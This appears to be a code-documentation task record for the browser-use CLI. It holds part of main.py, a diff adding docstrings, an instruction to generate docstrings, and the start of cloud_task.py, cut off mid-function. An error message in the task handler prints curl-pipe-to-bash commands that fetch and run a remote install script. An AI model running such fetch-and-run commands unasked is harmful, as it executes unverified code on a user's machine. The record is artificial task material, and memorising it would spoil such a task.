cookies_sub = cookies_p.add_subparsers(dest='cookies_command')
# cookies get [--url URL]
p = cookies_sub.add_parser('get', help='Get all cookies')
p.add_argument('--url', help='Filter by URL')
# cookies set <name> <value>
p = cookies_sub.add_parser('set', help='Set a cookie')
p.add_argument('name', help='Cookie name')
p.add_argument('value', help='Cookie value')
p.add_argument('--domain', help='Cookie domain')
p.add_argument('--path', default='/', help='Cookie path')
p.add_argument('--secure', action='store_true', help='Secure cookie')
p.add_argument('--http-only', action='store_true', help='HTTP-only cookie')
p.add_argument('--same-site', choices=['Strict', 'Lax', 'None'], help='SameSite attribute')
p.add_argument('--expires', type=float, help='Expiration timestamp')
# cookies clear [--url URL]
p = cookies_sub.add_parser('clear', help='Clear cookies')
p.add_argument('--url', help='Clear only for URL')
# cookies export <file>
p = cookies_sub.add_parser('export', help='Export cookies to JSON file')
p.add_argument('file', help='Output file path')
p.add_argument('--url', help='Filter by URL')
# cookies import <file>
p = cookies_sub.add_parser('import', help='Import cookies from JSON file')
p.add_argument('file', help='Input file path')
# -------------------------------------------------------------------------
# Wait Commands
# -------------------------------------------------------------------------
wait_p = subparsers.add_parser('wait', help='Wait for conditions')
wait_sub = wait_p.add_subparsers(dest='wait_command')
# wait selector <css>
p = wait_sub.add_parser('selector', help='Wait for CSS selector')
p.add_argument('selector', help='CSS selector')
p.add_argument('--timeout', type=int, default=30000, help='Timeout in ms')
p.add_argument('--state', choices=['attached', 'detached', 'visible', 'hidden'], default='visible', help='Element state')
# wait text <text>
p = wait_sub.add_parser('text', help='Wait for text')
p.add_argument('text', help='Text to wait for')
p.add_argument('--timeout', type=int, default=30000, help='Timeout in ms')
# -------------------------------------------------------------------------
# Get Commands (info retrieval)
# -------------------------------------------------------------------------
get_p = subparsers.add_parser('get', help='Get information')
get_sub = get_p.add_subparsers(dest='get_command')
# get title
get_sub.add_parser('title', help='Get page title')
# get html [--selector SELECTOR]
p = get_sub.add_parser('html', help='Get page HTML')
p.add_argument('--selector', help='CSS selector to scope HTML')
# get text <index>
p = get_sub.add_parser('text', help='Get element text')
p.add_argument('index', type=int, help='Element index')
# get value <index>
p = get_sub.add_parser('value', help='Get input element value')
p.add_argument('index', type=int, help='Element index')
# get attributes <index>
p = get_sub.add_parser('attributes', help='Get element attributes')
p.add_argument('index', type=int, help='Element index')
# get bbox <index>
p = get_sub.add_parser('bbox', help='Get element bounding box')
p.add_argument('index', type=int, help='Element index')
# -------------------------------------------------------------------------
# Python Execution
# -------------------------------------------------------------------------
p = subparsers.add_parser('python', help='Execute Python code')
p.add_argument('code', nargs='?', help='Python code to execute')
p.add_argument('--file', '-f', help='Execute Python file')
p.add_argument('--reset', action='store_true', help='Reset Python namespace')
p.add_argument('--vars', action='store_true', help='Show defined variables')
# -------------------------------------------------------------------------
# Agent Tasks
# -------------------------------------------------------------------------
from browser_use.skill_cli.install_config import is_mode_available
remote_available = is_mode_available('remote')
local_available = is_mode_available('chromium')
p = subparsers.add_parser('run', help='Run agent task (requires API key)')
p.add_argument('task', help='Task description')
p.add_argument('--max-steps', type=int, help='Maximum steps')
# Model selection (works both locally and remotely)
p.add_argument('--llm', help='LLM model (gpt-4o, claude-sonnet-4-20250514, gemini-2.0-flash)')
# Cloud-only flags - only show if remote mode is available
if remote_available:
# Add [remote] hint only if both modes are available (--full install)
remote_hint = '[remote] ' if local_available else ''
p.add_argument('--session-id', help=f'{remote_hint}Reuse existing cloud session ID')
p.add_argument('--proxy-country', help=f'{remote_hint}Proxy country code')
p.add_argument('--stream', action='store_true', help=f'{remote_hint}Stream output in real-time')
p.add_argument('--wait', action='store_true', help=f'{remote_hint}Wait for task to complete (default: async)')
p.add_argument('--flash', action='store_true', help=f'{remote_hint}Enable flash mode')
p.add_argument('--keep-alive', action='store_true', help=f'{remote_hint}Keep session alive after task')
p.add_argument('--thinking', action='store_true', help=f'{remote_hint}Enable extended reasoning')
p.add_argument('--vision', action='store_true', default=None, help=f'{remote_hint}Enable vision')
p.add_argument('--no-vision', action='store_true', help=f'{remote_hint}Disable vision')
# New SDK features
p.add_argument('--start-url', help=f'{remote_hint}URL to start the task from')
p.add_argument('--metadata', action='append', metavar='KEY=VALUE', help=f'{remote_hint}Task metadata (can repeat)')
p.add_argument('--secret', action='append', metavar='KEY=VALUE', help=f'{remote_hint}Task secrets (can repeat)')
p.add_argument(
'--allowed-domain',
action='append',
metavar='DOMAIN',
help=f'{remote_hint}Restrict navigation to domains (can repeat)',
)
p.add_argument('--skill-id', action='append', metavar='ID', help=f'{remote_hint}Enable skill IDs (can repeat)')
p.add_argument('--structured-output', metavar='SCHEMA', help=f'{remote_hint}JSON schema for structured output')
p.add_argument('--judge', action='store_true', help=f'{remote_hint}Enable judge mode')
p.add_argument('--judge-ground-truth', metavar='TEXT', help=f'{remote_hint}Expected answer for judge evaluation')
# -------------------------------------------------------------------------
# Task Management (Cloud) - only available if remote mode is installed
# -------------------------------------------------------------------------
if remote_available:
task_p = subparsers.add_parser('task', help='Manage cloud tasks')
task_sub = task_p.add_subparsers(dest='task_command')
# task list
p = task_sub.add_parser('list', help='List recent tasks')
p.add_argument('--limit', type=int, default=10, help='Maximum number of tasks to list')
p.add_argument('--status', choices=['running', 'finished', 'stopped', 'failed'], help='Filter by status')
p.add_argument('--session', help='Filter by session ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task status <task_id>
p = task_sub.add_parser('status', help='Get task status')
p.add_argument('task_id', help='Task ID')
p.add_argument('--compact', '-c', action='store_true', help='Show all steps with reasoning')
p.add_argument('--verbose', '-v', action='store_true', help='Show all steps with full details (URLs, actions)')
p.add_argument('--last', '-n', type=int, metavar='N', help='Show only the last N steps')
p.add_argument('--reverse', '-r', action='store_true', help='Show steps newest first (100, 99, 98...)')
p.add_argument('--step', '-s', type=int, metavar='N', help='Show specific step number')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task stop <task_id>
p = task_sub.add_parser('stop', help='Stop running task')
p.add_argument('task_id', help='Task ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task logs <task_id>
p = task_sub.add_parser('logs', help='Get task logs')
p.add_argument('task_id', help='Task ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# -------------------------------------------------------------------------
# Cloud Session Management - only available if remote mode is installed
# -------------------------------------------------------------------------
if remote_available:
session_p = subparsers.add_parser('session', help='Manage cloud sessions')
session_sub = session_p.add_subparsers(dest='session_command')
# session list
p = session_sub.add_parser('list', help='List cloud sessions')
p.add_argument('--limit', type=int, default=10, help='Maximum number of sessions to list')
p.add_argument('--status', choices=['active', 'stopped'], help='Filter by status')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session get <session_id>
p = session_sub.add_parser('get', help='Get session details')
p.add_argument('session_id', help='Session ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session stop <session_id> or session stop --all
p = session_sub.add_parser('stop', help='Stop cloud session(s)')
p.add_argument('session_id', nargs='?', help='Session ID (or use --all)')
p.add_argument('--all', action='store_true', help='Stop all active sessions')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session create - Create session without task
p = session_sub.add_parser('create', help='Create a new cloud session')
p.add_argument('--profile', help='Cloud profile ID')
p.add_argument('--proxy-country', help='Proxy country code')
p.add_argument('--start-url', help='Initial URL to navigate to')
p.add_argument('--screen-size', metavar='WxH', help='Screen size (e.g., 1920x1080)')
p.add_argument('--keep-alive', action='store_true', default=None, help='Keep session alive')
p.add_argument('--no-keep-alive', dest='keep_alive', action='store_false', help='Do not keep session alive')
p.add_argument('--persist-memory', action='store_true', default=None, help='Persist memory between tasks')
p.add_argument('--no-persist-memory', dest='persist_memory', action='store_false', help='Do not persist memory')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session share <session_id> - Create or delete public share
p = session_sub.add_parser('share', help='Manage public share URL')
p.add_argument('session_id', help='Session ID')
p.add_argument('--delete', action='store_true', help='Delete the public share')
p.add_argument('--json', action='store_true', help='Output as JSON')
# -------------------------------------------------------------------------
# Tunnel Commands
# -------------------------------------------------------------------------
tunnel_p = subparsers.add_parser('tunnel', help='Expose localhost via Cloudflare tunnel')
tunnel_p.add_argument(
'port_or_subcommand',
nargs='?',
default=None,
help='Port number to tunnel, or subcommand (list, stop)',
)
tunnel_p.add_argument('port_arg', nargs='?', type=int, help='Port number (for stop subcommand)')
tunnel_p.add_argument('--all', action='store_true', help='Stop all tunnels (use with: tunnel stop --all)')
# -------------------------------------------------------------------------
# Session Management
# -------------------------------------------------------------------------
# sessions
subparsers.add_parser('sessions', help='List active sessions')
# close
p = subparsers.add_parser('close', help='Close session')
p.add_argument('--all', action='store_true', help='Close all sessions')
# -------------------------------------------------------------------------
# Server Control
# -------------------------------------------------------------------------
server_p = subparsers.add_parser('server', help='Server control')
server_sub = server_p.add_subparsers(dest='server_command')
server_sub.add_parser('status', help='Check server status')
server_sub.add_parser('stop', help='Stop server')
server_sub.add_parser('logs', help='View server logs')
# -------------------------------------------------------------------------
# Profile Management (mode-aware: use -b real or -b remote)
# -------------------------------------------------------------------------
profile_p = subparsers.add_parser('profile', help='Manage browser profiles (use -b real or -b remote)')
profile_sub = profile_p.add_subparsers(dest='profile_command')
# profile list - lists local or cloud profiles based on -b flag
p = profile_sub.add_parser('list', help='List profiles (local with -b real, cloud with -b remote)')
p.add_argument('--page', type=int, default=1, help='Page number (cloud only)')
p.add_argument('--page-size', type=int, default=20, help='Items per page (cloud only)')
# profile get <id>
p = profile_sub.add_parser('get', help='Get profile details')
p.add_argument('id', help='Profile ID or name')
# profile create (cloud only)
p = profile_sub.add_parser('create', help='Create profile (cloud only)')
p.add_argument('--name', help='Profile name')
# profile update <id> (cloud only)
p = profile_sub.add_parser('update', help='Update profile (cloud only)')
p.add_argument('id', help='Profile ID')
p.add_argument('--name', required=True, help='New profile name')
# profile delete <id> (cloud only)
p = profile_sub.add_parser('delete', help='Delete profile (cloud only)')
p.add_argument('id', help='Profile ID')
# profile cookies <id> - list cookies by domain (local only)
p = profile_sub.add_parser('cookies', help='List cookies by domain (local only, requires -b real)')
p.add_argument('id', help='Profile ID or name (e.g. "Default", "Profile 1")')
# profile sync - sync local profile to cloud
p = profile_sub.add_parser('sync', help='Sync local Chrome profile to cloud')
p.add_argument('--from', dest='from_profile', help='Local profile name (e.g. "Default", "Profile 1")')
p.add_argument('--name', help='Cloud profile name (default: auto-generated)')
p.add_argument('--domain', help='Only sync cookies for this domain (e.g. "youtube.com")')
return parser
def handle_server_command(args: argparse.Namespace) -> int:
if args.server_command == 'status':
if is_server_running(args.session):
print(f'Server for session "{args.session}" is running')
return 0
else:
print(f'Server for session "{args.session}" is not running')
return 1
elif args.server_command == 'stop':
if not is_server_running(args.session):
print(f'Server for session "{args.session}" is not running')
return 0
response = send_command(args.session, 'shutdown', {})
if response.get('success'):
print(f'Server for session "{args.session}" stopped')
return 0
else:
print(f'Error: {response.get("error")}', file=sys.stderr)
return 1
elif args.server_command == 'logs':
log_path = Path(tempfile.gettempdir()) / f'browser-use-{args.session}.log'
if log_path.exists():
print(log_path.read_text())
else:
print('No logs found')
return 0
return 0
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
if not items:
return None
result: dict[str, str | None] = {}
for item in items:
if '=' in item:
key, value = item.split('=', 1)
result[key] = value
return result if result else None
def _handle_remote_run_with_wait(args: argparse.Namespace) -> int:
import asyncio
from browser_use.skill_cli.commands import cloud_session, cloud_task
if not args.task:
print('Error: No task provided', file=sys.stderr)
return 1
try:
# Handle vision flag (--vision vs --no-vision)
vision: bool | None = None
if getattr(args, 'vision', False):
vision = True
elif getattr(args, 'no_vision', False):
vision = False
# Parse key=value list params
metadata = _parse_key_value_list(getattr(args, 'metadata', None))
secrets = _parse_key_value_list(getattr(args, 'secret', None))
# Build session params
session_id = getattr(args, 'session_id', None)
profile_id = getattr(args, 'profile', None)
proxy_country = getattr(args, 'proxy_country', None)
# Create session first if profile or proxy specified and no session_id
if (profile_id or proxy_country) and not session_id:
session = cloud_session.create_session(
profile_id=profile_id,
proxy_country=proxy_country,
keep_alive=getattr(args, 'keep_alive', None),
)
session_id = session.id
# Create task with all cloud-only flags
task_response = cloud_task.create_task(
task=args.task,
llm=args.llm,
session_id=session_id,
max_steps=args.max_steps,
flash_mode=getattr(args, 'flash', None),
thinking=getattr(args, 'thinking', None),
vision=vision,
start_url=getattr(args, 'start_url', None),
metadata=metadata,
secrets=secrets,
allowed_domains=getattr(args, 'allowed_domain', None),
skill_ids=getattr(args, 'skill_id', None),
structured_output=getattr(args, 'structured_output', None),
judge=getattr(args, 'judge', None),
judge_ground_truth=getattr(args, 'judge_ground_truth', None),
)
# Print initial info immediately
print(f'mode: {args.browser}')
print(f'task_id: {task_response.id}')
print(f'session_id: {task_response.session_id}')
print('waiting...', end='', flush=True)
# Wait for completion
try:
result = asyncio.run(cloud_task.poll_until_complete(task_response.id))
except KeyboardInterrupt:
print(f'\nInterrupted. Task {task_response.id} continues remotely.')
return 0
# Print final result
print(' done.')
print(f'status: {result.status}')
print(f'output: {result.output}')
if result.cost:
print(f'cost: {result.cost}')
return 0
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
def main() -> int:
parser = build_parser()
args = parser.parse_args()
if not args.command:
parser.print_help()
return 0
# Handle server subcommands without starting server
if args.command == 'server':
return handle_server_command(args)
# Handle profile subcommands without starting server
if args.command == 'profile':
from browser_use.skill_cli.commands.profile import handle_profile_command
return handle_profile_command(args)
# Handle sessions list - find all running sessions
if args.command == 'sessions':
from browser_use.skill_cli.utils import find_all_sessions
session_names = find_all_sessions()
sessions = [{'name': name, 'status': 'running'} for name in session_names]
if args.json:
print(json.dumps(sessions))
else:
if sessions:
for s in sessions:
print(f' {s["name"]}: {s["status"]}')
else:
print('No active sessions')
return 0
# Handle close --all by closing all running sessions
if args.command == 'close' and getattr(args, 'all', False):
from browser_use.skill_cli.utils import find_all_sessions
session_names = find_all_sessions()
closed = []
for name in session_names:
try:
response = send_command(name, 'close', {})
if response.get('success'):
closed.append(name)
# Clean up metadata file
meta_path = get_session_metadata_path(name)
if meta_path.exists():
meta_path.unlink()
except Exception:
pass # Server may already be stopping
if args.json:
print(json.dumps({'closed': closed, 'count': len(closed)}))
else:
if closed:
print(f'Closed {len(closed)} session(s): {", ".join(closed)}')
else:
print('No active sessions')
return 0
# Handle setup command
if args.command == 'setup':
from browser_use.skill_cli.commands import setup
loop = asyncio.get_event_loop()
result = loop.run_until_complete(
setup.handle(
'setup',
{
'mode': args.mode,
'api_key': args.api_key,
'yes': args.yes,
'json': args.json,
},
)
)
if args.json:
print(json.dumps(result))
elif 'error' in result:
print(f'Error: {result["error"]}', file=sys.stderr)
return 1
else:
if result.get('status') == 'success':
print('\n✓ Setup complete!')
print(f'\nMode: {result["mode"]}')
print('Next: browser-use open https://example.com')
return 0
# Handle doctor command
if args.command == 'doctor':
from browser_use.skill_cli.commands import doctor
loop = asyncio.get_event_loop()
result = loop.run_until_complete(doctor.handle())
if args.json:
print(json.dumps(result))
else:
# Print check results
checks = result.get('checks', {})
print('\nDiagnostics:\n')
for name, check in checks.items():
status = check.get('status', 'unknown')
message = check.get('message', '')
note = check.get('note', '')
fix = check.get('fix', '')
if status == 'ok':
icon = '✓'
elif status == 'warning':
icon = '⚠'
elif status == 'missing':
icon = '○'
else:
icon = '✗'
print(f' {icon} {name}: {message}')
if note:
print(f' {note}')
if fix:
print(f' Fix: {fix}')
print('')
if result.get('status') == 'healthy':
print('✓ All checks passed!')
else:
print(f'⚠ {result.get("summary", "Some checks need attention")}')
return 0
# Handle task command - cloud task management
if args.command == 'task':
from browser_use.skill_cli.commands.cloud_task import handle_task_command
return handle_task_command(args)
# Handle session command - cloud session management
if args.command == 'session':
from browser_use.skill_cli.commands.cloud_session import handle_session_command
return handle_session_command(args)
# Handle tunnel command - runs independently of browser session
if args.command == 'tunnel':
from browser_use.skill_cli import tunnel
pos = getattr(args, 'port_or_subcommand', None)
if pos == 'list':
result = tunnel.list_tunnels()
elif pos == 'stop':
port_arg = getattr(args, 'port_arg', None)
if getattr(args, 'all', False):
# stop --all
result = asyncio.get_event_loop().run_until_complete(tunnel.stop_all_tunnels())
elif port_arg is not None:
result = asyncio.get_event_loop().run_until_complete(tunnel.stop_tunnel(port_arg))
else:
print('Usage: browser-use tunnel stop <port> | --all', file=sys.stderr)
return 1
elif pos is not None:
try:
port = int(pos)
except ValueError:
print(f'Unknown tunnel subcommand: {pos}', file=sys.stderr)
return 1
result = asyncio.get_event_loop().run_until_complete(tunnel.start_tunnel(port))
else:
print('Usage: browser-use tunnel <port> | list | stop <port>', file=sys.stderr)
return 0
# Output result
if args.json:
print(json.dumps(result))
else:
if 'error' in result:
print(f'Error: {result["error"]}', file=sys.stderr)
return 1
elif 'url' in result:
existing = ' (existing)' if result.get('existing') else ''
print(f'url: {result["url"]}{existing}')
elif 'tunnels' in result:
if result['tunnels']:
for t in result['tunnels']:
print(f' port {t["port"]}: {t["url"]}')
else:
print('No active tunnels')
elif 'stopped' in result:
if isinstance(result['stopped'], list):
if result['stopped']:
print(f'Stopped {len(result["stopped"])} tunnel(s): {", ".join(map(str, result["stopped"]))}')
else:
print('No tunnels to stop')
else:
print(f'Stopped tunnel on port {result["stopped"]}')
return 0
# Validate requested mode is available based on installation config
from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available
if not is_mode_available(args.browser):
print(get_mode_unavailable_error(args.browser), file=sys.stderr)
return 1
# Set API key in environment if provided
if args.api_key:
os.environ['BROWSER_USE_API_KEY'] = args.api_key
# Validate API key for remote browser mode upfront
if args.browser == 'remote':
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
try:
api_key = require_api_key('Remote browser')
# Ensure it's in environment for the cloud client
os.environ['BROWSER_USE_API_KEY'] = api_key
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
# Validate --profile flag usage
if args.profile and args.browser == 'chromium':
print(
'Error: --profile is not supported in chromium mode.\n'
'Use -b real for local Chrome profiles or -b remote for cloud profiles.',
file=sys.stderr,
)
return 1
# Handle remote run with --wait directly (prints task_id immediately, then waits)
if args.browser == 'remote' and args.command == 'run' and getattr(args, 'wait', False):
return _handle_remote_run_with_wait(args)
# Ensure server is running
ensure_server(args.session, args.browser, args.headed, args.profile, args.api_key)
# Build params from args
params = {}
skip_keys = {'command', 'session', 'browser', 'headed', 'json', 'api_key', 'server_command'}
for key, value in vars(args).items():
if key not in skip_keys and value is not None:
params[key] = value
# Add profile to params for commands that need it (agent tasks, etc.)
# Note: profile is passed to ensure_server for local browser profile,
# but also needs to be in params for cloud profile ID in remote mode
if args.profile:
params['profile'] = args.profile
# Send command to server
response = send_command(args.session, args.command, params)
# Clean up metadata file on successful close
if args.command == 'close' and response.get('success'):
meta_path = get_session_metadata_path(args.session)
if meta_path.exists():
meta_path.unlink()
# Output response
if args.json:
# Add mode to JSON output for browser-related commands
if args.command in ('open', 'run', 'state', 'click', 'type', 'input', 'scroll', 'screenshot'):
response['mode'] = args.browser
print(json.dumps(response))
else:
if response.get('success'):
data = response.get('data')
# Show mode for browser-related commands (first line of output)
if args.command in ('open', 'run'):
print(f'mode: {args.browser}')
if data is not None:
if isinstance(data, dict):
# Special case: raw text output (e.g., state command)
if '_raw_text' in data:
print(data['_raw_text'])
else:
for key, value in data.items():
# Skip internal fields
if key.startswith('_'):
continue
if key == 'screenshot' and len(str(value)) > 100:
print(f'{key}: <{len(value)} bytes>')
else:
print(f'{key}: {value}')
elif isinstance(data, str):
print(data)
else:
print(data)
else:
print(f'Error: {response.get("error")}', file=sys.stderr)
return 1
return 0
if __name__ == '__main__':
sys.exit(main()) | --- +++ @@ -1,4 +1,10 @@ #!/usr/bin/env python3
+"""Fast CLI for browser-use. STDLIB ONLY - must start in <50ms.
+
+This is the main entry point for the browser-use CLI. It uses only stdlib
+imports to ensure fast startup, delegating heavy operations to the session
+server which loads once and stays running.
+"""
import argparse
import asyncio
@@ -35,6 +41,7 @@
# Helper to find the subcommand (first non-flag argument)
def _get_subcommand() -> str | None:
+ """Get the first non-flag argument (the subcommand)."""
for arg in sys.argv[1:]:
if not arg.startswith('-'):
return arg
@@ -130,6 +137,7 @@
def get_socket_path(session: str) -> str:
+ """Get socket path for session."""
if sys.platform == 'win32':
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
@@ -138,10 +146,16 @@
def get_pid_path(session: str) -> Path:
+ """Get PID file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def _pid_exists(pid: int) -> bool:
+ """Check if a process with given PID exists.
+
+ On Windows, uses ctypes to call OpenProcess (os.kill doesn't work reliably).
+ On Unix, uses os.kill(pid, 0) which is the standard approach.
+ """
if sys.platform == 'win32':
import ctypes
@@ -160,6 +174,7 @@
def is_server_running(session: str) -> bool:
+ """Check if server is running for session."""
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -172,6 +187,7 @@
def connect_to_server(session: str, timeout: float = 60.0) -> socket.socket:
+ """Connect to session server."""
sock_path = get_socket_path(session)
if sock_path.startswith('tcp://'):
@@ -191,10 +207,12 @@
def get_session_metadata_path(session: str) -> Path:
+ """Get path to session metadata file (stores browser_mode, headed, profile)."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
def ensure_server(session: str, browser: str, headed: bool, profile: str | None, api_key: str | None) -> bool:
+ """Start server if not running. Returns True if started."""
from browser_use.skill_cli.utils import is_session_locked, kill_orphaned_server
meta_path = get_session_metadata_path(session)
@@ -306,6 +324,7 @@
def send_command(session: str, action: str, params: dict) -> dict:
+ """Send command to server and get response."""
request = {
'id': f'r{int(time.time() * 1000000) % 1000000}',
'action': action,
@@ -340,6 +359,7 @@
def build_parser() -> argparse.ArgumentParser:
+ """Build argument parser with all commands."""
# Import install config to get available modes and default
from browser_use.skill_cli.install_config import get_available_modes, get_default_mode
@@ -806,6 +826,7 @@
def handle_server_command(args: argparse.Namespace) -> int:
+ """Handle server subcommands."""
if args.server_command == 'status':
if is_server_running(args.session):
print(f'Server for session "{args.session}" is running')
@@ -838,6 +859,7 @@
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
+ """Parse a list of 'key=value' strings into a dict."""
if not items:
return None
result: dict[str, str | None] = {}
@@ -849,6 +871,7 @@
def _handle_remote_run_with_wait(args: argparse.Namespace) -> int:
+ """Handle remote run with --wait directly (prints task info immediately, then waits)."""
import asyncio
from browser_use.skill_cli.commands import cloud_session, cloud_task
@@ -930,6 +953,7 @@
def main() -> int:
+ """Main entry point."""
parser = build_parser()
args = parser.parse_args()
@@ -1228,4 +1252,4 @@
if __name__ == '__main__':
- sys.exit(main())+ sys.exit(main())
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/main.py |
Generate docstrings for exported functions |
import argparse
import json
import logging
import sys
from typing import Any
from browser_use_sdk.types.task_created_response import TaskCreatedResponse
from browser_use_sdk.types.task_item_view import TaskItemView
from browser_use_sdk.types.task_log_file_response import TaskLogFileResponse
from browser_use_sdk.types.task_view import TaskView
from browser_use.skill_cli.commands.utils import format_duration, get_sdk_client
logger = logging.getLogger(__name__)
def _filter_none(kwargs: dict[str, Any]) -> dict[str, Any]:
return {k: v for k, v in kwargs.items() if v is not None}
# ============ SDK Wrappers ============
def create_task(task: str, **kwargs: Any) -> TaskCreatedResponse:
params = _filter_none(kwargs)
params['task'] = task
return get_sdk_client().tasks.create_task(**params)
def get_task(task_id: str) -> TaskView:
return get_sdk_client().tasks.get_task(task_id)
def list_tasks(
limit: int = 10,
status: str | None = None,
session_id: str | None = None,
) -> list[TaskItemView]:
client = get_sdk_client()
response = client.tasks.list_tasks(
page_size=limit,
**_filter_none({'filter_by': status, 'session_id': session_id}),
)
return list(response.items) if response.items else []
def stop_task(task_id: str) -> TaskView:
return get_sdk_client().tasks.update_task(task_id, action='stop')
def get_task_logs(task_id: str) -> TaskLogFileResponse:
return get_sdk_client().tasks.get_task_logs(task_id)
async def poll_until_complete(
task_id: str,
stream: bool = False,
poll_interval: float = 1.0,
) -> TaskView:
import asyncio
client = get_sdk_client()
last_status = None
while True:
# Run blocking SDK call in thread to avoid blocking event loop
task = await asyncio.to_thread(client.tasks.get_task, task_id)
current_status = task.status
if stream and current_status != last_status:
print(f'Status: {current_status}')
last_status = current_status
if current_status in ('finished', 'stopped', 'failed'):
return task
await asyncio.sleep(poll_interval)
# ============ CLI Handlers ============
def handle_task_command(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
# Check if remote mode is available
if not is_mode_available('remote'):
print(
'Error: Task management requires remote mode.\n'
'Remote mode is not installed. Reinstall to enable:\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
file=sys.stderr,
)
return 1
# Check API key
try:
require_api_key('Cloud tasks')
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if args.task_command == 'list':
return _handle_list(args)
elif args.task_command == 'status':
return _handle_status(args)
elif args.task_command == 'stop':
return _handle_stop(args)
elif args.task_command == 'logs':
return _handle_logs(args)
else:
print('Usage: browser-use task <command>')
print('Commands: list, status <task_id>, stop <task_id>, logs <task_id>')
return 1
# ============ CLI Helper Functions ============
def _task_item_to_dict(task: Any) -> dict[str, Any]:
return {
'id': task.id,
'status': task.status,
'task': task.task,
'sessionId': task.session_id,
}
def _task_to_dict(task: Any) -> dict[str, Any]:
return {
'id': task.id,
'status': task.status,
'task': task.task,
'output': task.output,
'cost': task.cost,
'sessionId': task.session_id,
'startedAt': task.started_at.isoformat() if task.started_at else None,
'finishedAt': task.finished_at.isoformat() if task.finished_at else None,
'steps': [_step_to_dict(s) for s in (task.steps or [])],
}
def _step_to_dict(step: Any) -> dict[str, Any]:
return {
'number': step.number,
'url': step.url,
'memory': step.memory,
'actions': step.actions,
}
def _handle_list(args: argparse.Namespace) -> int:
try:
status_filter = getattr(args, 'status', None)
session_filter = getattr(args, 'session', None)
tasks = list_tasks(
limit=args.limit,
status=status_filter,
session_id=session_filter,
)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps([_task_item_to_dict(t) for t in tasks]))
else:
if not tasks:
status_msg = f' with status "{status_filter}"' if status_filter else ''
session_msg = f' in session "{session_filter}"' if session_filter else ''
print(f'No tasks found{status_msg}{session_msg}')
else:
header = f'Tasks ({len(tasks)})'
if status_filter:
header = f'{status_filter.capitalize()} tasks ({len(tasks)})'
print(f'{header}:')
for t in tasks:
task_id = t.id or 'unknown'
status = t.status or 'unknown'
task_desc = t.task or ''
# Truncate long task descriptions
if len(task_desc) > 50:
task_desc = task_desc[:47] + '...'
# Status emoji
status_emoji = {
'started': '🔄',
'running': '🔄',
'finished': '✅',
'stopped': '⏹️',
'failed': '❌',
}.get(status, '❓')
print(f' {status_emoji} {task_id[:8]}... [{status}] {task_desc}')
return 0
def _handle_status(args: argparse.Namespace) -> int:
try:
# Use get_task() for full details including steps
task = get_task(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_task_to_dict(task)))
else:
task_id = task.id or args.task_id
task_status = task.status or 'unknown'
output = task.output
cost = task.cost
steps = task.steps or []
started_at = task.started_at
finished_at = task.finished_at
compact = getattr(args, 'compact', False)
verbose = getattr(args, 'verbose', False)
last_n = getattr(args, 'last', None)
reverse = getattr(args, 'reverse', False)
specific_step = getattr(args, 'step', None)
# Determine display mode:
# - Default: show only latest step
# - --compact: show all steps with reasoning
# - --verbose: show all steps with full details
show_all_steps = compact or verbose
# Status emoji
status_emoji = {
'started': '🔄',
'running': '🔄',
'finished': '✅',
'stopped': '⏹️',
'failed': '❌',
}.get(task_status, '❓')
# Build header line: status, cost, duration
parts = [f'{status_emoji} {task_id[:8]}... [{task_status}]']
if cost is not None:
parts.append(f'${cost}')
duration = format_duration(started_at, finished_at)
if duration:
parts.append(duration)
print(' '.join(parts))
# Show steps
if steps:
total_steps = len(steps)
# Filter to specific step if requested
if specific_step is not None:
steps = [s for s in steps if s.number == specific_step]
if not steps:
print(f' Step {specific_step} not found (task has {total_steps} steps)')
else:
print(f' (showing step {specific_step} of {total_steps})')
# Display the specific step
for step in steps:
_print_step(step, verbose)
elif not show_all_steps:
# Default mode: show only the latest step
latest_step = steps[-1]
earlier_count = total_steps - 1
if earlier_count > 0:
print(f' ... {earlier_count} earlier steps')
_print_step(latest_step, verbose=False)
else:
# --compact or --verbose: show all steps (with optional filters)
skipped_earlier = 0
if last_n is not None and last_n < total_steps:
skipped_earlier = total_steps - last_n
steps = steps[-last_n:]
# Apply --reverse
if reverse:
steps = list(reversed(steps))
# Show count info
if skipped_earlier > 0:
print(f' ... {skipped_earlier} earlier steps')
# Display steps
for step in steps:
_print_step(step, verbose)
if output:
print(f'\nOutput: {output}')
return 0
def _print_step(step: Any, verbose: bool) -> None:
step_num = step.number if step.number is not None else '?'
memory = step.memory or ''
if verbose:
url = step.url or ''
actions = step.actions or []
# Truncate URL for display
short_url = url[:60] + '...' if len(url) > 60 else url
print(f' [{step_num}] {short_url}')
if memory:
# Truncate memory/reasoning for display
short_memory = memory[:100] + '...' if len(memory) > 100 else memory
print(f' Reasoning: {short_memory}')
if actions:
for action in actions[:2]: # Show max 2 actions per step
# Truncate action for display
short_action = action[:70] + '...' if len(action) > 70 else action
print(f' Action: {short_action}')
if len(actions) > 2:
print(f' ... and {len(actions) - 2} more actions')
else:
